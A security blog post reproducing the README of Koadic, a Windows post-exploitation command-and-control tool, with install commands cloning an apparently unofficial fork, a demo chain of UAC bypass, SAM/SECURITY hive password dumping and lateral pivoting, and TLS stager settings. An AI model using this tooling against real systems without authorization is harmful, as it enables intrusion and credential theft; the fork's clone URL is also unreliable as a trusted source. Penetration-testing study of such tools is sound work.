Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Install

$ git clone https://github.com/bxlcity/koadic-B.git
$ cd koadic
$ pip3 install -r requirements.txt
$ ./koadic

Demo info

  1. Hooks a zombie
  2. Elevates integrity (UAC Bypass)
  3. Dumps SAM/SECURITY hive for passwords
  4. Scans local network for open SMB
  5. Pivots to another machine

TLS Communications

To enable TLS communications, you will need to host your Koadic stager on a valid domain (i.e. malicious.com) with a known Root CA signed certificate. Windows will check its certificate store and will NOT allow a self-signed certificate.

Free certificates are available at: https://letsencrypt.org/getting-started/

(koadic: sta/js/mshta)$ set CERTPATH /path/to/fullchain.pem
(koadic: sta/js/mshta)$ set KEYPATH  /path/to/privkey.pem

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Creators

Contributors

  • @vvalien1
  • fbctf
  • cclaus
  • Arno0x
  • delirious-lettuce
  • 6IX7ine
  • psmitty7373

Acknowledgements

Special thanks to research done by the following individuals:



Share this post




About

Welcome to Cyber-Security.tk my personal blog to share my knowledge
Cyber Security, Ethical Hacking, Web & Network Auditing, Reverse Engineering and Cryptography
This website don't use analytics tracking and is ads-free. JavaScript is enabled .


Contact

Contact Form : Connect with Us

    Ricochet : ricochet:3ka6l4q255cakeirgxupsl5i4lw3qpk5gmngtv5amax64hckuovgozyd


2023 © 0x1 | Cyber Security Consulting - Copyright All Rights Reserved